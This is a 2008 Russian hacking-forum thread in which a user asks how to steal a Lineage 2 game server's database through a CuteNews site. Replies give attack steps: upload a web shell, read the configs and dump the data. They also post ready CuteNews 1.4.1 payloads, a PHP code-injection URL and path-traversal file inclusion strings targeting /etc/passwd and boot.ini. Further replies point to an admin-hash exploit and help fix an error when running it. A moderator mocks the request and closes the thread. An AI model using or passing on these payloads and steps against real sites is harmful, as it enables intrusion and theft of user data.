ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Стянуть базу через CuteNews
  #1  
Старый 24.06.2008, 18:05
Аватар для mad_SinneR
mad_SinneR
Новичок
Регистрация: 15.04.2007
Сообщений: 4
Провел на форуме:
31700

Репутация: 0
По умолчанию Стянуть базу через CuteNews

Пипл плс не удаляйте тему, ищу поиском нечё толкового ненаходит

Как можно через CuteNews угнать базу (допустим сервака ла2) помогите плс... Заранее спс!
 

  #2  
Старый 24.06.2008, 18:08
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Заливаешь шелл, смотришь конфиги -> коннектишся к серверу l2 -> сливаешь данные...
 

  #3  
Старый 25.06.2008, 14:48
Аватар для DJ ][akep
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
По умолчанию

CuteNews 1.4.1 Shell Injection
show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22te st%22)
;%20die;?%3E.%22%20HTTP/1.0\r\n
Cute News 1.4.1 Local File Inclusion
show_archives.php?template=../../../../../../../../../../etc/passwd%00
show_archives.php?template=../../../../../../../../../../boot.ini%00
Попробуй мож получиться
 

  #4  
Старый 26.06.2008, 19:26
Аватар для fasty
fasty
Познающий
Регистрация: 09.05.2008
Сообщений: 67
Провел на форуме:
690048

Репутация: 13
По умолчанию

Короче там уязвимость через moy-web и Cute News 1.4.1
Получаеш доступ к базе...
 

  #5  
Старый 26.06.2008, 19:33
Аватар для fasty
fasty
Познающий
Регистрация: 09.05.2008
Сообщений: 67
Провел на форуме:
690048

Репутация: 13
По умолчанию

Уязвимость по которой можно получить доступ к главной страничке кто знает что это такое
админка там в _http://sayt-l2-moyweb/news/
Эксплойты на узнавание ника и хеша пароля
_http://www.waraxe.us/tools/
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки, позволяющей получить MD5 хэш администратора, с использованием $_COOKIE. Атакующий может получить несанкционированный доступ к конфиденциальной информации на целевой системе.
 

  #6  
Старый 28.08.2008, 16:46
Аватар для Byrger
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Хммм...указал я путь до search.php
А какой ник вводить в эксплойте?

И когда запускаю эксплойт то он мне пишет:
Цитата:
Validating target URL

Fatal error: Call to undefined function curl_init() in C:\...CuteNewsEx.php on
line 227
 

  #7  
Старый 28.08.2008, 17:20
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от Byrger  
А какой ник вводить в эксплойте?
А собственно зачем тебе вообще это всё нужно, если ты даже не знаешь что делает эксплойт который ты юзаешь? Помоему оно тебе просто не нужно.

Цитата:
Сообщение от Byrger  
И когда запускаю эксплойт то он мне пишет:
Он тебе пишет что функция не инициализирована.
Это наверное потому что ты не поставил бибилиотеку с Курлом - поставь бибилотеку - будет работать.

P.S. закрыто.
P.P.S. вообще классная тема, звучит как "плиз, сломайте за меня, а то я ничего не умею делать, но очень хочется".
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом через cookie k00p3r Чужие Статьи 0 13.06.2005 13:56
Получение шела через Cgi приложения k00p3r Чужие Статьи 0 08.06.2005 15:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ